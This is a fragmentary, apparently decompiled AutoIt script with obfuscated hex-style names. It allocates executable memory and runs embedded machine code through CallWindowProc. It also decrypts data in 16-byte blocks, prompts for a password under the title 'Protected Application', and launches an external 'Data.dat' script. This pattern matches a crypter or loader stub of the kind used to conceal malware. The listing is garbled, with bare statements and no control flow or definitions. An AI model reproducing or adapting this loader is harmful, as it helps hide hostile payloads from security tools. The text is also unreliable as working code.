DllCall("kernel32.dll","ptr","VirtualAlloc","ptr",$F6AB5657DBA5ADAB,"ulong_ptr",$F6AB0651DBA5ADAB,"dword",$F6AB0657DB15ADAB,"dword",$F6AB065BDBA5ADAB)
@error 
SetError(@error,@extended, 0 )
DllCall("kernel32.dll","bool","VirtualFree","ptr",$F6AB5657DBA5ADAB,"ulong_ptr",$F6AB0651DBA5ADAB,"dword",$F6AB4657DBA5ADAB)
@error 
SetError(@error,@extended, False )
_F6AB0657DBFEADAB($F6AB06C7DBA5ADAB, 0 ,$F6AB0650DBA5ADAB)
Not IsDllStruct($F6AB06574BA5ADAB) 
@AutoItX64 
String(_F6A40657DBABADAB($F6AB0657D4A5ADAB))
StringInStr($F6AB0657FBA5ADAB,"87DB")
StringInStr($F6AB0657FBA5ADAB,"87C9")
StringInStr($F6AB0657FBA5ADAB,"87D2")
StringInStr($F6AB0657FBA5ADAB,"87F6")
StringInStr($F6AB0657FBA5ADAB,"09C0")
StringInStr($F6AB0657FBA5ADAB,"09DB")
StringInStr($F6AB0657FBA5ADAB,"09C9")
StringInStr($F6AB0657FBA5ADAB,"09D2")
StringInStr($F6AB0657FBA5ADAB,"09F6")
StringInStr($F6AB0657FBA5ADAB,"09FF")
StringInStr($F6AB0657FBA5ADAB,"09E4")
StringInStr($F6AB0657FBA5ADAB,"09ED")
Binary($F6AB0657FBA5ADAB)
_F6AB06F7DBA7ADAB( 0 ,BinaryLen($F6AB0657FBA5ADAB),$F6AB0657DCA5ADAB,$F6AB0757DBA5ADAB)
DllStructCreate("byte["&BinaryLen($F6AB0657FBA5ADAB)&"]",$F6AB06C7DBA5ADAB)
DllStructSetData($F6AB06574BA5ADAB, 1 ,$F6AB0657FBA5ADAB)
OnAutoItExitRegister("_F6AB0657D0ADADAB")
Binary($F6AB0657DFA5ADAB)
BinaryLen($F6AB0657DFA5ADAB)
DllStructCreate("byte["&$F6AB0957DBA5ADAB&"]")
DllStructSetData($F6AB0657D2A5ADAB, 1 ,$F6AB0657DFA5ADAB)
DllStructGetData($F6AB0657D2A5ADAB, 1 )
Not IsDllStruct($F6AB06574BA5ADAB) 
_F6AB06B7BBA5ADAB()
_F6AB0257DB55ADAB($F6AB0657DFA5ADAB)
DllStructCreate("byte[244]")
DllStructCreate("byte["&BinaryLen($F6AB0657DFA5ADAB)&"]")
DllStructSetData($F6AB06579BA5ADAB, 1 ,$F6AB0657DFA5ADAB)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($F6AB06574BA5ADAB)+$F6AB0657D9A5ADAB,"ptr",DllStructGetPtr($F6AB0657BBA5ADAB),"ptr",DllStructGetPtr($F6AB06579BA5ADAB),"uint",BinaryLen($F6AB0657DFA5ADAB)* 8 ,"int", 0 )
Not IsDllStruct($F6AB06574BA5ADAB) 
_F6AB06B7BBA5ADAB()
_F6AB0257DB55ADAB($F6AB0657DFA5ADAB)
DllStructCreate("byte[244]")
DllStructCreate("byte["&BinaryLen($F6AB0657DFA5ADAB)&"]")
DllStructSetData($F6AB06579BA5ADAB, 1 ,$F6AB0657DFA5ADAB)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($F6AB06574BA5ADAB)+$F6AB0357DBA5ADAB,"ptr",DllStructGetPtr($F6AB0657BBA5ADAB),"ptr",DllStructGetPtr($F6AB06579BA5ADAB),"uint",BinaryLen($F6AB0657DFA5ADAB)* 8 ,"int", 0 )
Not IsDllStruct($F6AB06574BA5ADAB) 
_F6AB06B7BBA5ADAB()
Not IsDllStruct($F6AB0657BBA5ADAB) 
SetError( 1 , 0 ,Binary(""))
Binary($F6AB0F57DBA5ADAB)
Ceiling(BinaryLen($F6AB0F57DBA5ADAB)/ 16 )
$F6AB0656DBA5ADAB= 0 
SetError( 1 , 0 ,Binary(""))
DllStructCreate("byte["&$F6AB0656DBA5ADAB&"]")
DllStructSetData($F6AB065EDBA5ADAB, 1 ,$F6AB0F57DBA5ADAB)
DllStructCreate("byte[16]")
DllStructSetData($F6AB06572BA5ADAB, 1 ,$F6AB06A7DBA5ADAB)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($F6AB06574BA5ADAB)+$F6AB0654DBA5ADAB,"ptr",DllStructGetPtr($F6AB0657BBA5ADAB),"ptr",DllStructGetPtr($F6AB065EDBA5ADAB),"uint",$F6AB0656DBA5ADAB,"ptr",DllStructGetPtr($F6AB06572BA5ADAB))
DllStructGetData($F6AB06572BA5ADAB, 1 )
DllStructGetData($F6AB065EDBA5ADAB, 1 )
Not IsDllStruct($F6AB06574BA5ADAB) 
_F6AB06B7BBA5ADAB()
Not IsDllStruct($F6AB0657BBA5ADAB) 
SetError( 1 , 0 ,Binary(""))
Binary($F6AB0F57DBA5ADAB)
BinaryLen($F6AB0F57DBA5ADAB)
$F6AB0656DBA5ADAB= 0 
SetError( 1 , 0 ,Binary(""))
DllStructCreate("byte["&$F6AB0656DBA5ADAB&"]")
DllStructSetData($F6AB065EDBA5ADAB, 1 ,$F6AB0F57DBA5ADAB)
DllStructCreate("byte[16]")
DllStructSetData($F6AB06572BA5ADAB, 1 ,$F6AB06A7DBA5ADAB)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($F6AB06574BA5ADAB)+$F6AB06577BA5ADAB,"ptr",DllStructGetPtr($F6AB0657BBA5ADAB),"ptr",DllStructGetPtr($F6AB065EDBA5ADAB),"uint",$F6AB0656DBA5ADAB,"ptr",DllStructGetPtr($F6AB06572BA5ADAB))
DllStructGetData($F6AB06572BA5ADAB, 1 )
DllStructGetData($F6AB065EDBA5ADAB, 1 )
Not IsDllStruct($F6AB06574BA5ADAB) 
_F6AB06B7BBA5ADAB()
Not IsDllStruct($F6AB0657BBA5ADAB) 
SetError( 1 , 0 ,Binary(""))
Binary($F6AB0F57DBA5ADAB)
BinaryLen($F6AB0F57DBA5ADAB)
$F6AB0656DBA5ADAB= 0 
SetError( 1 , 0 ,Binary(""))
DllStructCreate("byte["&$F6AB0656DBA5ADAB&"]")
DllStructSetData($F6AB065EDBA5ADAB, 1 ,$F6AB0F57DBA5ADAB)
DllStructCreate("byte[16]")
DllStructSetData($F6AB06572BA5ADAB, 1 ,$F6AB06A7DBA5ADAB)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($F6AB06574BA5ADAB)+$F6AB0637DBA5ADAB,"ptr",DllStructGetPtr($F6AB0657BBA5ADAB),"ptr",DllStructGetPtr($F6AB065EDBA5ADAB),"uint",$F6AB0656DBA5ADAB,"ptr",DllStructGetPtr($F6AB06572BA5ADAB))
DllStructGetData($F6AB06572BA5ADAB, 1 )
DllStructGetData($F6AB065EDBA5ADAB, 1 )
_F6AB0057DB65ADAB($F6AB0657BBA5ADAB,$F6AB06A7DBA5ADAB,$F6AB0F57DBA5ADAB)
BinaryLen($F6AB0F57DBA5ADAB)
BinaryMid($F6AB0F57DBA5ADAB,$F6AB0647DBA5ADAB, 1 )=Binary("0x80") 
BinaryMid($F6AB0F57DBA5ADAB, 1 ,$F6AB0647DBA5ADAB- 1 )
Binary($F6AB0F57DBA5ADAB)
BinaryLen($F6AB0F57DBA5ADAB)<= 16 
SetError( 1 , 0 ,Binary(""))
BinaryMid($F6AB0F57DBA5ADAB, 1 , 16 )
BinaryMid($F6AB0F57DBA5ADAB, 17 )
String($F6AB0687DBA5ADAB)
_F6AB0651DB25ADAB($F6AB0657DFA5ADAB)
_F6AB065735A5ADAB($F6AB0657BBA5ADAB,$F6AB06A7DBA5ADAB,$F6AB0F57DBA5ADAB)
_F6AB0651DB25ADAB($F6AB0657DFA5ADAB)
_F6AB0657D9A7ADAB($F6AB0657BBA5ADAB,$F6AB06A7DBA5ADAB,$F6AB0F57DBA5ADAB)
_F6AD0657DDA5ADAB($F6AB0657DFA5ADAB)
_F6AC0657DBA8ADAB($F6AB0657BBA5ADAB,$F6AB06A7DBA5ADAB,$F6AB0F57DBA5ADAB)
BinaryLen($F6AB065CDBA5ADAB)= 0 
SetError( 1 , 0 ,Binary(""))
@AutoItX64 
StringInStr($F6AB0657FBA5ADAB,"89C0")
StringInStr($F6AB0657FBA5ADAB,"89D2")
StringInStr($F6AB0657FBA5ADAB,"89F6")
Binary($F6AB0657FBA5ADAB)
_F6AB06F7DBA7ADAB( 0 ,BinaryLen($F6AB0657FBA5ADAB),$F6AB0657DCA5ADAB,$F6AB0757DBA5ADAB)
DllStructCreate("byte["&BinaryLen($F6AB0657FBA5ADAB)&"]",$F6AB0617DBA5ADAB)
DllStructSetData($F6AB0657D0A5ADAB, 1 ,$F6AB0657FBA5ADAB)
DllStructCreate("byte[16]")
StringLen($F6AB0657D4A5ADAB)
DllStructCreate("byte["&$F6AB0157DBA5ADAB&"]")
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($F6AB0657D0A5ADAB)+$F6AB06570BA5ADAB,"ptr",DllStructGetPtr($F6AB0677DBA5ADAB),"int", 0 ,"int", 0 ,"int", 0 )
DllCall("user32.dll","int","CallWindowProc","ptr",DllStructGetPtr($F6AB0657D0A5ADAB)+$F6AB0657D5A5ADAB,"str",$F6AB0657D4A5ADAB,"uint",$F6AB0157DBA5ADAB,"ptr",DllStructGetPtr($F6AB0657D7A5ADAB),"ptr",DllStructGetPtr($F6AB0677DBA5ADAB))
DllStructGetData(DllStructCreate("uint",DllStructGetPtr($F6AB0657D7A5ADAB)), 1 )
DllStructCreate("byte["&($F6AB0657DDA5ADAB+ 16 )&"]")
DllCall("user32.dll","uint","CallWindowProc","ptr",DllStructGetPtr($F6AB0657D0A5ADAB)+$F6AB06573BA5ADAB,"ptr",DllStructGetPtr($F6AB0657D7A5ADAB)+ 4 ,"ptr",DllStructGetPtr($F6AB0653DBA5ADAB),"int", 0 ,"int", 0 )
_F6AB0657DBFEADAB($F6AB0617DBA5ADAB, 0 ,$F6AB0650DBA5ADAB)
BinaryMid(DllStructGetData($F6AB0653DBA5ADAB, 1 ), 1 ,$F6AB065CDBA5ADAB[ 0 ])
Number($F6AB0C57DBA5ADAB)
Number($F6AB0C57DBA5ADAB)
_F6AB06B7BBA5ADAB()
BinaryToString(_F6AB8651DBA5ADAB($F6AB06578BA5ADAB[$F6AB0657D3A5ADAB],$F6AB0457DBA5ADAB))
_F6AB0637DBAFADAB()
_F6AB0696DBA5ADAB(3)
_F6AB2657DBA5ADAB("")
_F6AB0657DB75ADAB($F6AB0D57DBA5ADAB,$F6AB0057DBA5ADAB)
_F6AB0657DB95ADAB($F6AB0A57DBA5ADAB, 0 ,$F6AB0D57DBA5ADAB)
_F6AB0657DBB5ADAB($F6AB0D57DBA5ADAB,$F6AB0A57DBA5ADAB, 0 )
_F6ABF657DBA5ADAB($F6AB0A57DBA5ADAB, 0 ,$F6AB0A57DBA5ADAB, 0 )
_F6AB065ADBA5ADAB($F6AB0D57DBA5ADAB, 1 )
_F6AB0657DBF5ADAB($F6AB0A57DBA5ADAB, 0 , 1 )
$cmdline[0]>0 
$F6AB0657DBA5ADAB="" 
$F6AB0657DBA5ADAB<= 0 Or $F6AB0657DBA5ADAB>UBound($F6AB06578BA5ADAB)- 1 
String($F6AB0657DBA5ADAB)
$F6AB06578BA5ADAB[$F6AB0657DBA5ADAB]="" And $F6AB0857DBA5ADAB= True 
InputBox("Protected Application","Please Enter your Password: ","","*", 250 , 140 )
Not @Compiled 
Run(@ScriptFullPath&' /AutoIt3ExecuteScript "'&@ScriptDir&'\Data.dat"')
